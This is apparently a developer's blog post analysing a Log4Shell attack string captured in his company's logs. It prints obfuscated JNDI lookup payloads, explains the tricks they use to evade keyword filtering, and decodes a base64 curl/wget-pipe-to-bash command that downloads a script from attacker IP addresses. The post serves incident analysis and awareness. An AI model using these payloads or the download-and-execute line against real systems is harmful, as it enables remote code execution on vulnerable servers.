Log4j shell attack. Let’s analyze one attack we received

image from https://imagevars.gulfnews.com/2021/12/21/Log4j-vulnerability_17ddda60e9b_large.jpg

Disclaimer

We are safe, everything was patched the day the vulnerability was announced.

Background

I work for a luxury company and we use Datadog for logging, tracing, infrastructure and monitoring.

I searched just for curiosity and found a few attacks, from which 1 was very interesting.

Please don’t run any commands on your computer. Use a `VM` or `container` instead

I use gitpod.io, which is a container ubuntu instance that has no access to any of my private data. I don’t even use a VM on GCP is 2 dangerous.

So what the attack looks like

Is just an endpoint that will resolve thanks to log4j.

This is the log I got from Datadog

It has so many levels of complexity

To me it looks like a guy who really knows what is doing.

We can see 3 strings.

  1. ${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
  2. ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
  3. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}

So he sent 3 commands, just in case 1 failed because we were string filtering against it.

${lower:l}${lower:d}${lower:a}${lower:p} makes sure that fi we are filtering by ldap we won’t be able to catch it, but the log4j will resolve it into ldap

the same trick he used also for the jndi word

If we take the IP and search for its location we find that is from Russia

I just searched on Google for iplocation and the first site that it came out is this one

https://www.iplocation.net/ip-lookup

So basically our hacker tried has a server in Russia and is trying to make our service call his server on port 12344

I don’t see any special case that he is using this port. If you see any, please let me know in the comments

Let’s see the params that he is using.

/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=

The first 3 commands don’t look very interesting, except that he may be using this server for other kinds of attacks, and that is very precise and organized. Maybe he was not a blackhat but more as a developer that was trying to see if he can hack us with this easy-to-use log4j bug.

But the base64 string is very interesting, let’s decode it with an online decoder like https://www.base64decode.org/

screenshot from https://www.base64decode.org/

Now, this is interesting!

Dam, so he hid a bash code into a base64. I’ve been a developer for 10 years and did not know that a base64 code can resolve into a bash script.

The bash script is doing curl call to a server 195.54.160.149on port 5874

So the IP again from Russia on a port that has nothing special.

In case you were asking what the IP after the port is about, well my dear reader, this is a great question with a very simple answer

the IP 195.54.160.149 is a proxy, to 34.231.205.69

So the real server is 34.231.205.69 , let’s see the location

Surprise Surprise, this is a USA IP. Someone pretended to be someone else.

This is very interesting but I won’t comment.

Another thing about the bash script is that it firstcurl 195.54.160.149:5874 then if the curl does not return an error it executes the wget , the magic part here is the or operator||

Also, another thing to notice is the -s (silent) option that will create no logs, very smart.

If the curl does not return an error, then the script uses the wget to download a file wget -q -O- 195.54.160.149:5874/34.231.205.69:80 and pass the entire script to bash using the pipe | so it gets executed without leaving any tracks.

(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80)|bash

Smart, very smart.

Let’s see what this command downloads

I will open a Gitpod instance, modify the script to download the bash script instead of executing it

(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80) > bad-actor-script.txt

So it looks like it does not return anything. Empty string.

I guess that he removed the script from the response and put it back only when he is doing the attacks.

My thoughts

I think there were other levels into this attack but he removed the script from the response.

I think the USA IP is just a free amazon account that he (or she ) uses as a proxy.

I think is a very skilled person, who has done many attacks, has a lot of experience, and knows how to cover the tracks.

I, to some extent, like him. Great job!

What do you think about this attack?

let me know in the comments.

Also, let me know if you want to see other attacks that we received.

Thank you for reading and as always,
If you enjoyed please leave a few claps 👏👏👏
As it helps me a lot.

Have a lovely day.

--

--

--

Full stack developer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why PointPay is a Secure Platform?

Shame and Regret… but would I do it again??

Ugreen USB Bluetooth dongle

Formation Fi: EARLY ADOPTION PROGRAM (SECOND SNAPSHOT IS NEAR!)

Unlocking $CROD tokens for Ambassadors

The new generation of distributed data storage public chain CDS, everyone is their own data manager

Whenever WhatsApp is in trouble, the Telegram chat application which in fact is a competitor seems…

Sobhan’s Filing System For information gathering.

Nervos Researcher Alan Szepieniec’s Paper Accepted by the International Association for…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Brainless

Brainless

Full stack developer

More from Medium

How to try Linux without removing your existing operating system (yes it’s possible)

My cloud is no longer just someone else’s computer

Are you a software engineer or a mercenary?

The Truth About The Log4J Security Issue.